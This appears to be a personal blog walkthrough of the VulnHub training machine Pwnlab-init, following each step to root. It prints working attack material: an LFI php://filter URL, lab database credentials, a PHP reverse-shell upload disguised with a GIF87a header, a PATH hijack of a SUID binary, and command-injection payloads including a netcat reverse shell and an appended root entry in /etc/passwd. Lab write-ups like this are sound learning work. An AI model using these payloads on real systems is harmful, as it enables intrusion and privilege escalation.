The next machine on the list is Pwnlab-init which can be downloaded here: https://www.vulnhub.com/entry/pwnlab-init,158/
To find the IP adress of the machine we used netdiscover on our local network.
The machine should be on the 130 address. Lets start an normal nmap scan and a full nmap scan. Lets have a look at the results:
So we got a couple ports, port 80, 111 and 3306. Lets start the tools Nikto and Dirb on the running webservice to do some enumeration. The full nmap scan didn’t provided any extra ports. While these are running, lets have a look at port 80 by going to the webaddress.
Seems like a simple website. We can not upload anything since we have to be logged in. Lets try a simple SQL injection. From the nmap results we already knew there is mysql running. Inputting
' or 1=1 —
or ' or 1=1 # didn’t gave us any luck. The ?page parameter looks vulnerable to LFI but again, I didn’t have any luck getting to the passwd files or anything.
Nikto and Dirb didn’t gave us much info either. There is a config file but we can not read its contents. Feels like we have to do a SQL injection on the website. But first lets have a look on the other services running. I checked the rpc service but I couldn’t connect to it with showmount. No idea how this worked so I looked it up, still not to familiar with it. Seems like a dead end.
After some reading I found out that we have to do a LFI using the php wrapper described in this blog. Which will base64 decode the config file and give us the base64 string, which we can decode to get the contents of the config file. Lets try this out. By going to the following url:
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=config we could get the base64 string of the config file.
To easily decode the base64 string we can use cyberchef at https://gchq.github.io/. or we echo the base64 string and pipe this into the base64 command.
echo "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8" | base64 -d
Seems like we got the username and password for the mysql database which is root:H4u%QJ_H99. Can we use this to login into the website aswell? Nop this is not possible. By using the command
mysql -h 192.168.0.130 -u root -p and the password we could login to the mysql server.
It has been a while ago since I used mysql and had a look around. So you can see the commands and output below without a ton of errors in between:
MySQL [(none)]> use Users; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [Users]> show tables; +-----------------+ | Tables_in_Users | +-----------------+ | users | +-----------------+ 1 row in set (0.000 sec) MySQL [Users]> select * from users; +------+------------------+ | user | pass | +------+------------------+ | kent | Sld6WHVCSkpOeQ== | | mike | U0lmZHNURW42SQ== | | kane | aVN2NVltMkdSbw== | +------+------------------+ 3 rows in set (0.000 sec)
So we got 3 values, which seems to be base64 decoded since there is a == at the end. Lets base64 decode this as we did above and have a look if it seems like a password or not.
Kane:iSv5Ym2GRo. Seems valid lets try it.
We are logged in and greeted with a upload functionality.
Lets copy a php reverse webshell and change it contents to connect to our IP and port 8080.
cp /usr/share/webshells/php/php-reverse-shell.php ~/pwnlabinit/
Lets upload this file and we get the error “Not allowed extension, please upload images only.” So we can try a couple things. Lets ty to do a .png.php file. Which also failed. Aah ye, I need to setup burb still. Lets do this quickly, install the certificate and foxyproxy etc. After setting it up, lets see if we can just upload the .php file and change the request to look like its .png or something. I think I have to change these values:
So lets upload a png file and see what the content-type looks like so we can use that when we intercept the upload of the php file. The PNG file show the following:
So lets upload the php file and change the content-type to image/png. But since burp is using 8080 now we had to change the reverse shell to port 443 and start a listener with the command
nc -lvp 443. So lets upload the file and see. We still get the error Not allowed extension, please upload images only.
Apparently if you upload the file with
GIF87a in front of the php tag, it surpasses the header check, thinking it is a GIF image. Like the screenshot below:
When you open the file in the /upload/ directory you get an error, thinking the image is corrupt. You can not open it this way. It took me quite some time and I had to lookup some help. But the lang cookie is vulnerable, since it uses the include statement. Running the file you want.
We got a reverse shell as the www-data user.
We have no tty control, so lets spawn a tty shell. The command
python -c 'import pty; pty.spawn("/bin/sh")' worked for me. So after looking around a bit, I found the same usernames. Would these work with the passwords we found earlier?
Kent works but nothing interesting, Mike didn’t work and in Kane his home directory is a executable named msgmike with Mike as the owner and group.
The ./msgmike executable is executing cat.I had no idea how to exploit this so I googled and came up to the following: https://www.pentestpartners.com/security-blog/exploiting-suid-executables/. Sine we own the path variable we can change it so it executes another executable as the user Mike, since there is the SUID bit and Mike is the owner. Lets save the current $PATH variable since we have to set it back after incase we need to do something else.
We make a executable named cat with the contents of spawning a shell.
echo "/bin/bash" > cat && chmod +x cat after that we change the PATH to . (The current directory) with the following command:
Export PATH=. and then we run the msgmike again and we are Mike. NICE!
Now we have to change the PATH variable back since we can not to anything. So we do
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games and we can use command again. In the home directory of mike there is another executable, owned by root with the SUID bit set. Do we have to do the same? Lets run it and have a look.
Doesn’t seem like we have to use the same vulnerability. What a bummer. So after looking into the executable with strings I saw the following:
Seems like it is executing echo in the /bin directory, meaning we can not change the path variable like before. However it is pasting our input into the %s spot (I think). So I tried putting the following as the message:
&& echo "test" > /tmp/test.txt making the whole command
/bin/echo %s && echo "test" > /tmp/test.txt >> /root/messages.txt. And it made the test.txt file in /tmp. Owned by root.
Now we have to think of a payload to get root access. We can probably do a reverse shell. Lets try this:
&& nc 192.168.0.129 4444 –e /bin/bash &&. But first start a listener on our machine with
nc -lvp 4444 but this did not work! We got a shell as mike.
Dammn then you FUCK up the whole machine by overwriting
/etc/passwd instead of attending. RIP. After reversing the machine and doing the exploits above again. We are the user Mike again… Now lets retry echoing a new line to the passwd file with the following message
&& echo "roott::0:0:root:/root:/bin/bash" >> /etc/passwd &&. But to be sure, lets snapshot the machine quickly. Execute the message and have a look at the /etc/passwd file.
Ye right, the password for mike was incorrect when we tried to login on it. So we have to add a line for mike that it doesn’t have a password I guess. Lets try :D. We still got a failure. Lets go back to Kane and try
su? hmm seems not possible. After some googling I found the following on stackoverflow:
So after redoing it with a hash instead of an empty password we got root 😀 This took me quite some time but learned a lot of exploiting vulnerable executables. Never did this before! Was fun!